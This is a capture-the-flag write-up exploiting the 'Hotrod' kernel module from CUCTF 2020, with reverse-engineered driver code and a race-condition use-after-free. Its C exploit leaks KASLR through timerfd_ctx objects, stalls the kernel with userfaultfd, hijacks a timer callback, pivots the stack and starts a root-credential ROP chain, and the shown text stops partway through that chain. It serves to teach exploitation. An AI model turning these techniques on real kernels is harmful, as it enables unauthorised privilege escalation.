[CUCTF 2020] Hotrod: Exploiting timerfd_ctx Objects In The Linux Kernel

Hotrod is a kernel exploitation challenge created by my friend FizzBuzz101 for CUCTF 2020. I tested the challenge before it was released and since the exploitation process was very interesting, I decided to write this article. In the next sections we will see how to get a root shell exploiting a UAF, using a single allocation, a timerfd_ctx structure and userfaultfd. Let’s get started!

Information Gathering

Before touching the kernel module, we need to better understand the system itself, gathering as much information as possible. The golden rule is always the same: system analysis first, then code analysis.

We can start inspecting run_challnge.sh:

#!/bin/sh

qemu-system-x86_64 \
    -s \
    -m 64M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr nosmap min_addr=4096" \
    -no-reboot \
    -cpu qemu64,+smep \
    -monitor /dev/null \
    -initrd "./initramfs.cpio" \
    -smp 2 \
    -smp cores=2 \
    -smp threads=1

We can immediately see that various protections are enabled.

– SMEP (Supervisor Mode Execution Prevention):

With SMEP, the CPU will generate a fault if we try to directly execute instructions in user space. This means that even if we are able to control the kernel instruction pointer, we cannot simply map an executable memory region in user space, place our code there and execute it.

Luckily, since SMAP (Supervisor Mode Access Prevention) is disabled, we can still access data in higher CPU rings, so we can build our ROP-chain in user space, perform stack pivoting and start executing gadgets. Another approach is to turn off the 20th flag of the CR4 register to disable SMEP and then directly execute code in user space:

– KASLR (Kernel Address Space Layout Randomization):

With this option, every time the system boots up, the location of kernel code in memory is randomized with an entropy of 9 bits. This means that if we want to build a ROP-chain, we will probably need to leak pointers to compute the current kernel base address.

– KPTI (Kernel Page Table Isolation):

KPTI has been implemented in the Linux kernel after the Meltdown security vulnerability. It helps preventing information leaks separating user space and kernel space page tables. Changing the 12th flag of the CR3 register, the system can switch between two sets of page tables. When the system runs in kernel mode, it uses the first set, so it can access both kernel and user address space (The latter for things like copy_to_user etc.). In addition, the NX flag is set in the top level of the user portion of kernel page tables, this way any missed kernel to user CR3 switch will cause a crash. When the system runs in user mode instead, it uses the second set, now it can only access a copy of user address space, and just a limited portion of kernel address space: the code needed for system calls and IDT.

uname -a
Linux (none) 5.8.3 #12 Sun August 26 12:00:00 UTC 2020 x86_64 GNU/Linux

The kernel version is very recent, I couldn’t find any known vulnerability to perform privilege escalation.

The QEMU monitor is set to /dev/null: we cannot use the monitor console to interact with QEMU and control the guest OS.

We can proceed extracting symbol addresses and ROP gadgets. Since the System.map file is not provided and we cannot access /proc/kallsyms as unprivileged user, we need to extract the filesystem and modify the init file to get root privileges.

The filesystem is compressed using the cpio format, we can extract it and replace uid/gid using the following commands:

mkdir fs && cd fs && cpio -idv < ../initramfs.cpio # Extract the archive
sed -i 's/setuidgid 1000 sh/setuidgid 0 sh/g' init # Replace the user uid/gid
find . | cpio --create --format='newc'  > ../initramfs.cpio # Rebuild the archive

The next step is to disable KASLR, we can do this by modifying the kernel command line options:

sed -i 's/kaslr/nokaslr/g' run_challenge.sh

Finally we can get symbols from /proc/kallsyms.

I also created /bin/info, containing:

#!/bin/sh

HOTROD=$(cat /proc/kallsyms | grep hotrod_ioctl | cut -d " " -f1)
echo [*] Module base: 0x$HOTROD

Then I added /bin/sh /bin/info in the init file, so every time the system boots up I can get the hotrod_ioctl address.

Now we can re-enable KASLR, restore the uid/gid to 1000 and rebuild the cpio archive.

To obtain ROP gadgets, we need to extract the kernel image. We can do this using binwalk to locate the vmlinuz file (the compressed kernel image) inside bzImage:

binwalk bzImage

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
15109         0x3B05          gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00)

Then we can use dd to extract it and gunzip to decompress the archive:

dd if=./bzImage bs=1 skip=15109 of=vmlinux.gz && gunzip vmlinux.gz

Now we can finally extract ROP gadgets using ropper or ROPGadget:

ropper --file ./vmlinux --nocolor > gadgets

PS: We could also have used the extract-vmlinux script to extract the kernel image.

Reverse Engineering

file hotrod.ko
hotrod.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=6bcf4da490ac3e3ab5db8148eb08238250716d32, with debug_info, not stripped

I won’t cover the reverse engineering process (from asm to pseudo C) in detail to avoid unnecessarily lengthening the article. Here is my high-level representation of the module after static analysis:

#define ALLOC 0xBAADC0DE
#define FREE  0xC001C0DE
#define SHOW  0x1337C0DE
#define EDIT  0xDEADC0DE

static DEFINE_MUTEX(hotrod_lock);

static unsigned int allocated, freed, showed, edited;
struct miscdevice hotrod_dev;
struct file_operations hotrod_fops;

hotrod_fops.unlocked_ioctl = hotrod_ioctl;

struct {
    unsigned long size;
    char *content;
} req;


struct {
    unsigned long size;
    char *content;
} hotrod;


int init_hotrod()
{
    mutex_init(&hotrod_lock);

    hotrod_dev.minor = 255; // MISC_DYNAMIC_MINOR
    hotrod_dev.name = "hotrod";
    hotrod_dev.fops = &hotrod_fops;

    if (!misc_register(&hotrod_dev)) {
        printk(KERN_INFO, "Hotrod Driver Initialized\n");
        printk(KERN_INFO, "Remember, all of the features only work once!\n");
        return 0;
    }

    return -1;
}


int hotrod_ioctl(struct file *file, unsigned int action, unsigned long user_req)
{
    unsigned long allocation_size;

    switch (action) {
        case ALLOC:

            if (!allocated) {
                allocation_size = user_req;
                allocated = 1;

                if (!hotrod.size && !hotrod.content && 0xe0 <= allocation_size  <= 0xf0) {
                    hotrod.content = kmalloc(allocation_size, GFP_KERNEL);
                    if (hotrod.content) {
                        hotrod.size = allocation_size;
                        return 0;
                    }
                }
            }

            return -1;

        case FREE:

            if (!freed) {
                freed = 1;

                if (hotrod.size && hotrod.content) {
                    kfree(hotrod.content);
                    hotrod.contet = 0;
                    hotrod.size = 0;
                    return 0;
                }
            }

            return -1;

        case SHOW:

            if (!showed && hotrod.size) {
                showed = 1;

                if (hotrod.content) {
                    copy_from_user(&req, user_req, 0x10);
                    if (req.size <= hotrod.size) {
                        copy_to_user(req.content, hotrod.content, req.size);
                        return 0;
                    }
                }
            }

            return -1;

        case EDIT:

            if (!edited && hotrod.size) {
                edited = 1;

                if (!hotrod.content) {
                    copy_from_user(&req, user_req, 0x10);
                    if (req.size <= hotrod.size) {
                        copy_from_user(hotrod.content, req.content, req.size);
                        return 0;
                    }
                }
            }

            return -1;
    }
}


void exit_hotrod()
{
    misc_deregister(&hotrod_dev);
    printk(KERN_INFO, "Hotrod Driver Removed\n");
}

As we can see, the init_hotrod() function is using misc_register(), an interface that allows kernel modules to register a misc device.

In Linux, each device is identified by a major and a minor number. The major number is used by the kernel to identify the driver associated with the device. The misc driver is identified by the major number 10. The minor number depends on the device and it’s used by the driver to differentiate among various devices.

misc_register() takes as argument a miscdevice structure, in this case hotrod_dev.

We can see that in hotrod_dev, three fields are set:

minor: In this case set to 255, corresponds to MISC_DYNAMIC_MINOR and as we can see from kernel.org: If the minor number is set to MISC_DYNAMIC_MINOR a minor number is assigned and placed in the minor field of the structure.
name: It leaves no room for imagination…
fops: A pointer to the file_operations structure. This structure exposes interfaces needed by users to interact with the device. In this case unlocked_ioctl() is the only exposed function, which we will cover shortly.

After initialization, the device node is created in /dev. Now we can perform I/O operation on it:

ls -la /dev | grep hotrod
crw-rw-rw-    1 root     root       10,  63 Oct  19 09:11 hotrod

The hotrod_ioctl() function, allows us to perform four different operations: Alloc, Free, Show and Edit, but remember, we can perform each action only once!

The allocation size is limited between 0xe0 and 0xf0 bytes, to understand what it means, let’s briefly introduce the Slab Allocator.

The Slab allocator is used by the Linux kernel to group objects of the same size into caches. Each cache consist of one or more slabs and each slab is composed by one or more contiguous page frames. In each slab are stored a certain number of objects.

There are two classes of caches:

General purpose caches: They are called kmalloc-N where N is a power of two: kmalloc-64, kmalloc-128, kmalloc-256 and so on.
Specialized caches: Used for common objects: task_struct, mm_struct, vm_area_struct and so on.

/proc/slabinfo can be used by privileged users to get information about slabs.

The Slab allocator uses a LIFO scheme to perform allocations and deallocations. The kernel will keep track of freed objects in per-cpu freelists and will serve them when a new allocation of the same size takes place.

Please note that this is just a very basic overwiew of the Slab allocator, for a detailed explanation check the articles in References.

At this point we know that allocations in limited range 0xe0-0xf0 bytes, will end up in kmalloc-256. Let’s proceed analyzing the module source code to spot the bug.

The Bug

The old ioctl() implementation ran under Big Kernel Lock. From The new way of ioctl():

ioctl() is one of the remaining parts of the kernel which runs under the Big Kernel Lock (BKL).
In the past, the usage of the BKL has made it possible for long-running ioctl()
methods to create long latencies for unrelated processes.

It was very inefficient in SMP environment, since during ioctl operations nothing else could be executed, therefore, two new functions have been introduced: unlocked_ioctl() and compat_ioctl(). In kernel version 2.6.36, the old ioctl implementation has been completely removed, as we can see from kill .ioctl file_operation.

From The new way of ioctl() we can also understand the difference between the old and the new ioctl() implementation:

If a driver or filesystem provides an unlocked_ioctl() method, it will be called in preference to the older ioctl().
The differences are that the inode argument is not provided (it's available as filp->f_dentry->d_inode)
and the BKL is not taken prior to the call.
All new code should be written with its own locking, and should use unlocked_ioctl().

This is what we were looking for. Hotrod is using unlocked_ioctl() but it does not implement its own locking!

This means that we can use multiple threads to cause a race condition that will result in a Use-After-Free. This, later on, will allow us to ger RIP control.

We can formulate the exploitation plan as follows:

We can use Alloc to get an allocation in kmalloc-256 and find a way to get a leak using Show.
Then we can use Edit to modify the allocated object in kernel space. At the same time, with another thread, we can use Free to release the structure and allocate a victim object in the same location (because of freelists LIFO behavior).
At this point the Edit operation will end up overwriting function pointers in the victim object and we will be able to hijack control flow.

To succeed in our plan, we need two elements:

An object allocable in kmalloc-256 that can be used both to get an information leak and to hijack control flow.
A way to make the race condition reliable: we can perform each operation only once, so we need to find a way to maximize the success rate of the race condition.

The Victim Object - timerfd_ctx

As we can see from this useful article, an interesting structure allocated in kmalloc-256 cache, is timerfd_ctx.

struct timerfd_ctx
{
    union
    {
    struct hrtimer tmr;
    struct alarm alarm;
    } t;
    ktime_t tintv;
    ktime_t moffs;
    wait_queue_head_t wqh;
    u64 ticks;
    int clockid;
    short unsigned expired;
    short unsigned settime_flags;   /* to show in fdinfo */
    struct rcu_head rcu;
    struct list_head clist;
    spinlock_t cancel_lock;
    bool might_cancel;
};

The structure in the union are respectively a hrtimer structure:

struct hrtimer
{
    struct timerqueue_node node; // timerqueue node, which also manages node.expires
    ktime_t _softexpires; // the absolute earliest expiry time of the hrtimer.
    enum hrtimer_restart (*function)(struct hrtimer *); // timer expiry callback function
    struct hrtimer_clock_base *base; // pointer to the timer base (per cpu and per clock)
    u8 state; // state information (See bit values above)
    u8 is_rel; // Set if the timer was armed relative
    u8 is_soft; // Set if hrtimer will be expired in soft interrupt context.
};

And an alarm structure:

struct alarm
{
    struct timerqueue_node node; // timerqueue node adding to the event list this value also includes the expiration time.
    struct hrtimer timer; // hrtimer used to schedule events while running
    enum alarmtimer_restart (*function)(struct alarm *, ktime_t now); // Function pointer to be executed when the timer fires.
    enum alarmtimer_type type; // Alarm type (BOOTTIME/REALTIME).
    int state; // Flag that represents if the alarm is set to fire or not.
    void *data; // Internal data value.
};

This object is allocated when a timer instance is created by timerfd_create().

timerfd_ctx is a good candidate since it can be used to leak kernel function pointers (to bypass KASLR), kernel heap addresses and to hijack control flow.

It is important to note that the structure is freed using kfree_rcu(). kfree_rcu() will deallocate the object after a grace period to ensure it is no longer used by any thread. We can use sleep(1) after closing the timerfd_ctx file descriptor to make sure it has actually been freed, then we can use Alloc and Show to get an information leak.

To hijack control flow, we can overwrite the function pointer in the hrtime structure, timerfd_tmrproc(): this function is automatically called by the kernel when the corresponding timer expires.

Here’s timerfd_ctx in memory. We are interested in the highlighted fields:

        0xffff888000297900:  0xffff888000297900 [1]    0x0000000000000000  
        0xffff888000297910:  0x0000000000000000        0x00000002ef81037a [2]             
        0xffff888000297920:  0x00000002ef81037a [3]    0xffffffff81102a00 [4]
        0xffff888000297930:  0xffffffff8183e080        0x0000000000000000      
        0xffff888000297940:  0x0000000000000000        0x0000000000000000      
        0xffff888000297950:  0x0000000000000000        0x0000000000000000      
        0xffff888000297960:  0x0000000000000000        0x0000000000000000      
        0xffff888000297970:  0x0000000000000000        0x0000000000000000      
        0xffff888000297980:  0xbdbbd3bf6c2a6d81        0xffff888000297988      
        0xffff888000297990:  0xffff888000297988        0x0000000000000000      
        0xffff8880002979a0:  0x0000000000000000        0xffff88800013eb00      
        0xffff8880002979b0:  0x00000000000000a8        0x0000000000000000      
        0xffff8880002979c0:  0x0000000000000000        0x0000000000000000      
        0xffff8880002979d0:  0x0000000000000000        0x0000000000000000      
        0xffff8880002979e0:  0x0000000000000000        0x0000000000000000

        [1] Address of current timer node (basically the chunk address)
        [2-3] ktime_t, expiry time of the hrtimer
        [4] timerfd_tmrproc() function pointer

Optimizing The Race Condition With Userfaultfd

At this point we have the victim object and an exploitation strategy. Now we need to find a way to make the race condition reliable. We will do it taking advantage of a feature of the Linux kernel: usefaultfd.

userfaultfd, allows unprivileged* user space processes to handle page faults and perform other memory management tasks, for example it can be used to measure page fault latency. But this feature also has a dark side: it can be used to suspend kernel threads.

An attacker can start monitoring a specific memory range, let’s say a page of memory, waiting for page faults. When the kernel tries to access that page, for example with copy_from_user(), it will cause a page fault and the control will be transferred to the page faults handler in user space.

This will give the attacker the ability to suspend the kernel thread for an arbitrary amount of time and reliably exploit possible race conditions.

*From kernel 5.11 usefaultfd is not longer usable by unprivileged users. FUSE is a good alternative.

Exploitation Plan

Now that we have all the pieces of the puzzle, we can reformulate our plan as follows:

To get a memory leak, we can allocate a timerfd_ctx structure using timerfd_create(), then we can free the object by closing the associated file descriptor.

At this point, we can get an allocation at the same location using Alloc and leak the timerfd_tmrproc() address using Show.

To control the kernel instruction pointer, let’s see what happens when we use Edit:

[...]
            if (!edited && hotrod.size) {
                edited = 1;

                if (!hotrod.content) {
                    copy_from_user(&req, user_req, 0x10); // [1]
                    if (req.size <= hotrod.size) {
                        copy_from_user(hotrod.content, req.content, req.size); // [2]
                        return 0;
                    }
                }
            }
[...]

The user request is copied to kernel space using copy_from_user() [1]. Then, after a size check, req.size bytes are copied from req.content to the previously allocated memory region using a second copy_from_user() call. [2].

This means that if we map a memory region, let’s say a page of memory, and we use it as req.content, userfaultfd can be used to handle the page fault and suspend the kernel thread in the middle of the copy operation.

We first map a page of memory:

void *page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

Then, with another thread, we start monitoring the mapped region using userfaultfd, waiting for a page fault. Now we trigger the copy operation using Edit from the main thread: this will cause a page fault in [2].

At this point the control will be transferred to the page fault handler thread and we will be able to suspend the faulting thread. Now, always with the page fault handler thread, we can:

Use Free to deallocate the object.
Allocate a timerfd_ctx structure at the same location (because of freelists LIFO behavior).
Release the faulting thread: the copy operation will overwrite the victim object.

The whole process can be visualized with the following diagram:

                       +
                       |
                       |
            +----------v----------+
            |    create_timer()   |    +------+
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_alloc()     |           +---->  Leak
            +----------+----------+           |
                       |                      |
                       |                      |
            +----------v----------+           |
            |      do_show()      |    +------+
            +----------+----------+
                       |
                       |
            +----------v----------+
            |   pthread_create()  +--------------------------+
            +----------+----------+                          |
                       |                                     |
                       |                          +----------v----------+
                       |                          |    userfaultfd()    |
                       |                          +----------+----------+
                       |                                     |
                       |                                     |
                       |                          +--------->+
                       |                          |          |
                       |                          |          |
                       |                          |   ... polling ...
                       |                          |          |
            +----------v----------+               |          |
            |      do_edit()      |               +----------+
            +----------+----------+                          |
                       |                                     |
                       X                                 PAGE FAULT         +------+
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      do_free()      |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |    create_timer()   |          +--->  Handle PF            
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                                                  +----------v----------+          |
                                                  |      ioctl_ufd()    |          |
                                                  +----------+----------+          |
                                                             |                     |
                                                             |                     |
                       X                                  RELEASE           +------+
                       |
            +----------v----------+
            | Edit complete (UAF) |
            +---------------------+

The Exploit - Controlling RIP

We can start writing the helper functions to interact with the device.

#define DEVICE_PATH "/dev/hotrod"

#define ALLOC 0xBAADC0DE
#define FREE 0xC001C0DE
#define SHOW 0x1337C0DE
#define EDIT 0xDEADC0DE

#define PAGE_SIZE 0x1000

static int fd, ufd;
static unsigned long size = 0xf0;
static unsigned char buff[0xf0];
static unsigned long kernel_base, leak, timerfd_ctx, pivot;
static void *page;

struct request
{
    unsigned long size;
    unsigned char *buff;
};


void hexdump(unsigned char *buff, unsigned long size)
{
    int i,j;

    for (i = 0; i < size/8; i++)
    {
        if ((i % 2) == 0)
        {
            if (i != 0)
                printf("  \n");

            printf("  %04x  ", i*8);
        }

        unsigned long ptr = ((unsigned long *)(buff))[i];
        printf("0x%016lx", ptr);
        printf("    ");

    }
    printf("\n");
}


void do_alloc(unsigned long size)
{
    ioctl(fd, ALLOC, size);
}


void do_free(int fd)
{
    ioctl(fd, FREE);
}


void do_show(unsigned char *dest, unsigned long size)
{
    struct request req;

    req.size = size;
    req.buff = dest;

    ioctl(fd, SHOW, &req);
}


void do_edit(unsigned char *src, unsigned long size)
{
    struct request req;

    req.size = size;
    req.buff = src;

    ioctl(fd, EDIT, &req);
}

A timer can be created using:

int create_timer(int leak)
{
    struct itimerspec its;

    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 0;
    its.it_value.tv_sec = 10;
    its.it_value.tv_nsec = 0;

    int tfd = timerfd_create(CLOCK_REALTIME, 0);
    timerfd_settime(tfd, 0, &its, 0);

    if (leak)
    {
        close(tfd);
        sleep(1);
        return 0;
    }
}

Now we need userfaultfd:

int userfaultfd(int flags)
{
    return syscall(SYS_userfaultfd, flags);
}


int initialize_ufd()
{
    int fd;

    puts("[*] Mmapping page...");
    page = mmap((void *)0xdead000, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);

    struct uffdio_register reg;

    if ((fd = userfaultfd(O_NONBLOCK)) == -1)
    {
        perror("[ERROR] Userfaultfd failed");
        exit(-1);
    }

    struct uffdio_api api = { .api = UFFD_API };

    if (ioctl(fd, UFFDIO_API, &api))
    {
        perror("[ERROR] ioctl - UFFDIO_API failed");
        exit(-1);
    }

    if (api.api != UFFD_API)
    {
        puts("[ERROR] Unexepcted UFFD api version!");
        exit(-1);
    }

    printf("[*] Start monitoring range: %p - %p\n", page, page + PAGE_SIZE);

    reg.mode = UFFDIO_REGISTER_MODE_MISSING;
    reg.range.start = (long)(page);
    reg.range.len = PAGE_SIZE;

    if (ioctl(fd, UFFDIO_REGISTER,  &reg))
    {
        perror("[ERROR] ioctl - UFFDIO_REGISTER failed");
        exit(-1);
    }

    return fd;
}

And the page fault handler:

void *page_fault_handler(void *_ufd)
{
    struct pollfd pollfd;
    struct uffd_msg fault_msg;
    struct uffdio_copy ufd_copy;

    int ufd = *((int *) _ufd);

    pollfd.fd = ufd;
    pollfd.events = POLLIN;

    while (poll(&pollfd, 1, -1) > 0)
    {

        if ((pollfd.revents & POLLERR) || (pollfd.revents & POLLHUP))
        {
            perror("[ERROR] Polling failed");
            exit(-1);
        }

        if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg))
        {
            perror("[ERROR] Read - fault_msg failed");
            exit(-1);
        }

        char *page_fault_location = (char *)fault_msg.arg.pagefault.address;

        if (fault_msg.event != UFFD_EVENT_PAGEFAULT || (page_fault_location != page && page_fault_location != page + PAGE_SIZE))
        {
            perror("[ERROR] Unexpected pagefault?");
            exit(-1);
        }

        if (page_fault_location == (void *)0xdead000)
        {
            printf("[+] Page fault at address %p!\n", page_fault_location);

            puts("[*] Freeing...");
            do_free(fd);

            puts("[*] Creating second timer...");
            create_timer(0);

            ((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
            ((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
            ((unsigned long *)(buff))[0x5] = 0x4141414141414141; // [1]

            puts("[*] Structure will be overwritten with: ");
            hexdump(buff, size);

            sleep(1);

            ufd_copy.dst = (unsigned long)0xdead000;
            ufd_copy.src = (unsigned long)(&buff);
            ufd_copy.len = PAGE_SIZE;
            ufd_copy.mode = 0;
            ufd_copy.copy = 0;

            if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
            {
                perror("ioctl(UFFDIO_COPY)");
                exit(-1);
            }

            exit(0);
        }
    }
}

As we can see from [1], with this first POC we should be able to overwrite the kernel RIP with a bounch of “A"s.

int main(void)
{
    pthread_t tid;

    fd = open(DEVICE_PATH, O_RDONLY);

    puts("[*] Allocating/Freeing timerfd_ctx structure...");
    create_timer(1);

    puts("[*] Leaking timerfd_tmrproc address...");
    do_alloc(size);
    do_show(buff, size);

    puts("[+] Object dump: ");
    hexdump(buff, size);

    leak = ((unsigned long *)(buff))[0x5];
    timerfd_ctx = ((unsigned long *)(buff))[0];
    kernel_base = leak - 0x81102a00UL + 0x100000000UL;

    printf("[+] Leaked timerfd_ctx structure address: 0x%lx\n", timerfd_ctx);
    printf("[+] Leaked timerfd_tmrproc address: 0x%lx\n", leak);
    printf("[+] Kernel base address: 0x%lx\n", (0xffffffff00000000UL + kernel_base));

    int ufd = initialize_ufd();
    pthread_create(&tid, NULL, page_fault_handler, &ufd);

    puts("[*] Triggering page fault...");
    do_edit(page, size);

    pthread_join(tid, NULL);

}

Here’s the complete POC code: poc.c

We can compile and run the exploit:

gcc -o poc poc.c -static -s -lpthread

    / $ /home/user/poc
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
    0000  0xffff88800029bf00    0x0000000000000000      
    0010  0x0000000000000000    0x00000002e3f48042      
    0020  0x00000002e3f48042    0xffffffff81102a00      
    0030  0xffffffff8183e080    0x0000000000000000      
    0040  0x0000000000000000    0x0000000000000000      
    0050  0x0000000000000000    0x0000000000000000      
    0060  0x0000000000000000    0x0000000000000000      
    0070  0x0000000000000000    0x0000000000000000      
    0080  0xbd7dd3bf6c2aa381    0xffff88800029bf88      
    0090  0xffff88800029bf88    0x0000000000000000      
    00a0  0x0000000000000000    0xffff88800015ad00      
    00b0  0x00000000000000a8    0x0000000000000000      
    00c0  0x0000000000000000    0x0000000000000000      
    00d0  0x0000000000000000    0x0000000000000000      
    00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029bf00
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xfffffffd00000000
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
    0000  0xffff88800029b900    0x0000000000000000      
    0010  0x0000000000000000    0x000000000eae0e65      
    0020  0x000000000eae0e65    0x4141414141414141 <- timerfd_tmrproc [1]      
    0030  0xffffffff8183e080    0x0000000000000000      
    0040  0x0000000000000000    0x0000000000000000      
    0050  0x0000000000000000    0x0000000000000000      
    0060  0x0000000000000000    0x0000000000000000      
    0070  0x0000000000000000    0x0000000000000000      
    0080  0xbd7bd3bf6c2aa481    0xffff88800029b988      
    0090  0xffff88800029b988    0x0000000000000000      
    00a0  0x0000000000000000    0xffff88800013f800      
    00b0  0x00000000000000a8    0x0000000000000000      
    00c0  0x0000000000000000    0x0000000000000000      
    00d0  0x0000000000000000    0x0000000000000000      
    00e0  0x0000000000000000    0x0000000000000000    
    general protection fault: 0000 [#1] PTI
    CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12          
    RIP: 0010:0x4141414141414141 // [2]
    Code: Bad RIP value.
    RSP: 0018:ffffc90000003f18 EFLAGS: 00000006
    [...]

As expected, overwriting the timerfd_tmrproc() pointer [1] we can get RIP control when the timer fires. [2] Now we need to create a ROP chain and perform stack pivoting.

It’s time to use GDB: we are interested in the CPU context when timerfd_tmrproc() is called. We need one of the registers to contain a pointer to a controllable location: here we will place our fake stack address.

Let’s comment the following line in our poc:

((unsigned long *)(buff))[0x5] = 0x4141414141414141;

Now we can attach GDB to the kernel and set a brakpoint to timerfd_tmrproc().

When the timer expires, timerfd_tmrproc() is executed and the breakpoint is hit. From the CPU context, we can see the RDI contains 0xffff88800029bc00, the address of the timerfd_ctx object:

In red, we can see the address of the structure itself, in green timerfd_tmrproc:

Since the RDI is pointing to the timerfd_ctx structure, and we have full control over its first field, we can place our fake stack here (Remember that it can be mapped in user space because SMAP is not enabled):

void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

Then, the following gadget can use utilized to perform stack pivoting:

0xffffffff81027b86: mov esp, dword ptr [rdi]; lea rax, [rax + rsi*8]; ret;

We can make the following changes in the page_fault_handler() function:

[...]
void *fake_stack = mmap((void *)0xcafe000, PAGE_SIZE*5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_POPULATE|MAP_PRIVATE, 0, 0);

((unsigned long *)(buff))[0x0] = (unsigned long)(fake_stack + 0x800);
((unsigned long *)(buff))[0x3] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x4] = 0x000000000eae0e65;
((unsigned long *)(buff))[0x5] = (unsigned long)(pivot);

unsigned long *rop = (unsigned long *)(fake_stack + 0x800);

*rop ++= 0x4242424242424242;
[...]

And execute the exploit again:

    / $ /home/user/poc
    [*] Allocating/Freeing timerfd_ctx structure...
    [*] Leaking timerfd_tmrproc address...
    [+] Object dump:
        0000  0xffff88800029b600    0x0000000000000000      
        0010  0x0000000000000000    0x00000002f21b349d      
        0020  0x00000002f21b349d    0xffffffff81102a00      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd74d3bf6c2aab81    0xffff88800029b688      
        0090  0xffff88800029b688    0x0000000000000000      
        00a0  0x0000000000000000    0xffff88800013f000      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    [+] Leaked timerfd_ctx structure address: 0xffff88800029b600
    [+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
    [+] Kernel base address: 0xffffffff00000000
    [*] Mmapping page...
    [*] Start monitoring range: 0xdead000 - 0xdeae000
    [*] Triggering page fault...
    [+] Page fault at address 0xdead000!
    [*] Freeing...
    [*] Creating second timer...
    [*] Structure will be overwritten with:
        0000  0x000000000cafe800    0x0000000000000000      
        0010  0x0000000000000000    0x000000000eae0e65      
        0020  0x000000000eae0e65    0xffffffff81027b86      
        0030  0xffffffff8183e080    0x0000000000000000      
        0040  0x0000000000000000    0x0000000000000000      
        0050  0x0000000000000000    0x0000000000000000      
        0060  0x0000000000000000    0x0000000000000000      
        0070  0x0000000000000000    0x0000000000000000      
        0080  0xbd70d3bf6c2aaa81    0xffff88800029b288      
        0090  0xffff88800029b288    0x0000000000000000      
        00a0  0x0000000000000000    0xffff88800013fb00      
        00b0  0x00000000000000a8    0x0000000000000000      
        00c0  0x0000000000000000    0x0000000000000000      
        00d0  0x0000000000000000    0x0000000000000000      
        00e0  0x0000000000000000    0x0000000000000000    
    general protection fault: 0000 [#1] PTI
    CPU: 0 PID: 66 Comm: exploit Tainted: G           O      5.8.3 #12
    RIP: 0010:0x4242424242424242 // [1]
    Code: Bad RIP value.
    RSP: 0018:000000000cafe808 EFLAGS: 00000006 // [2]
    [...]

Success! After stack pivoting, we overwritten RIP with a bounch of “B"s [1], and the RSP now contains 0xcafe808 [2]. It’s time to finalize our ROP-chain!

The Exploit - From “B"s To Root Shell

As a first attempt, let’s try to read the flag. We can extend the ROP chain replicating the effect of commit_creds(prepare_kernel_cred(0).

In Linux every task has its own set of credentials defined by cred structure. cred, specifies the security context of the task.

prepare_kernel_cred() will allocate a new set of credentials uid,gid etc. set to 0 and commit_creds() will apply it to the current task. This way we will be able to get root privileges.

Then we need to change the 12th flag of the CR3 register (remember that KPTI is enabled), use swapgs to swap GS back to the user GS, saved in MSR and then use iretq to return to user space.

We can do it in different ways. For example we can use the symbol swapgs_restore_regs_and_return_to_usermode. Using GDB we can see that swapgs_restore_regs_and_return_to_usermode + 0x16 is a perfect gadget for us:

We can find similar instructions when the system returns to user space after a syscall:

The only difference is that the first gadget utilizes iretq, the second one sysretq instead:

iretq expects the following stack layout when returning to user space:

    +-------------------+
    |        RIP        |
    +-------------------+
    |        CS         |
    +-------------------+
    |       RFLAGS      |
    +-------------------+
    |        RSP        |
    +-------------------+
    |        SS         |
    +-------------------+

sysretq accepts user space RIP from RCX and RFLAGS from R11 instead.

We can save the current processor state using:

static void save_state()
{
    __asm__ __volatile__(
    "movq %0, cs;"
    "movq %1, ss;"
    "pushfq;"
    "popq %2;"
    : "=r" (usr_cs), "=r" (usr_ss), "=r" (usr_rflags) : : "memory" );
}

And read the flag with:

void read_flag()
{
    char flag[100];
    read(open("/flag", O_RDONLY), flag, 100);
    puts(flag);
}

I chose the the second gadget to return to user space, here is how the ROP chain looks like:

*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
